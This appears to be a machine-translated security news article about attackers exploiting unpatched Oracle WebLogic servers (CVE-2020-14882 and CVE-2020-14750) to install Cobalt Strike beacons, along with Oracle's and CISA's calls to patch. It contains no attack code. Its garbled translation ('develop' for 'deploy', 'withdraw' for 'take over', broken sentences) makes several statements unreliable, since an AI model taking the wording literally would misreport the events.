Saturday, January 16, 02:01
Home security Hackers exploit Oracle servers to develop Cobalt Strike

Hackers exploit Oracle servers to develop Cobalt Strike

Hackers are actively exploiting unrepaired Oracle WebLogic servers against CVE-2020-14882 to develop Cobalt Strike beacons that allow constant remote access to compromised devices.

Cobalt Strike is a legitimate penetration testing tool used by hackers in post-breach tasks and to development of so-called beacons that allow them to gain constant remote access.

This later allows them to access the compromised servers to collect data and develop malware payloads.

Cobalt Strike

Incoming ransomware attacks

CVE-2020-14882 (RCE) Remote Code Defect was fixed by Oracle during last month's Critical Patch Update and used by invaders for scan for exposed WebLogic servers one week later.

Since then, a relative vulnerability RCE without authentication referred to as CVE-2020-14750 - which also allows unauthorized retrieval of unpatched instances - was addressed by a security update released last weekend.

This last series attacks targeting vulnerable WebLogic instances launched over the weekend, as SANS ISC operator Renato Marinho revealed in an advisory.

Attackers use a chain of scripts Powershell with base64 encoding to download and install Cobalt Strike payloads on unpatched Oracle WebLogic servers.

Oracle servers

Administrators were prompted to fix the systems immediately

As both CVE-2020-14882 and CVE-2020-14750 can be easily exploited by unauthorized invaders to withdraw vulnerable WebLogic servers, Oracle advises companies to apply immediately security updates to block them attacks.

"Because of the seriousness of this vulnerability, Oracle recommends that customers implement them updates provided by this Security Alert as soon as possible after the implementation of the Critical Patch Update of October 2020 ″, the company said in the weekend advisory.

CISA also called them managers apply the update security as soon as possible to address the two critical vulnerabilities.

Source of information:


Please enter your comment!
Please enter your name here

Teo Ehc
Teo Ehc
Be the limited edition.


Android: How to see which apps have access to your site

It's no secret that smartphone apps have access to many permissions - if you let them. It is important to make sure ...

Canon lets you take pictures from space

Instead of releasing new cameras for CES 2021, Canon is doing something different: It lets you take pictures from space ....

Wikipedia vs Big tech: Who fights misinformation?

As Election Day turned into US Election Week, Facebook, Twitter and YouTube were trying to prevent ...

Tesla: It is called to recall cars due to problematic screens

The touch screen in some Tesla cars seems to have a problem, which could ...

Ransomware is responsible for half of all data breaches in hospitals

Almost half of the data breaches committed in hospitals and the wider healthcare sector are due to ransomware attacks, ...

Astronomers have just found the oldest oversized black hole

A quasar was discovered in a dark corner of space - over 13,03 billion light-years away - and contains a ...

What are the best and most affordable 5G phones for 2021

The market will soon be flooded with mid-range 5G devices. Everything that happens will be really exciting: you will be able to ...

Verified Twitter accounts in a cryptocurrency scam with the name of Elon Musk violated!

Lately, hackers have been violating verified Twitter accounts in a cryptocurrency giveaway scam, in which the name of the CEO is used ...

Classiscam: Fraudsters "fake" brands and deceive users of European markets!

Dozens of criminal gangs publish fake ads in popular online markets, to attract unsuspecting users to "fraudulent" commercial sites or phishing ...

iOS 14.4: Displays a notification for repairs with non-genuine cameras

Starting with the iPhone 11, Apple has added a notification to iOS that tells the user when the device has a ...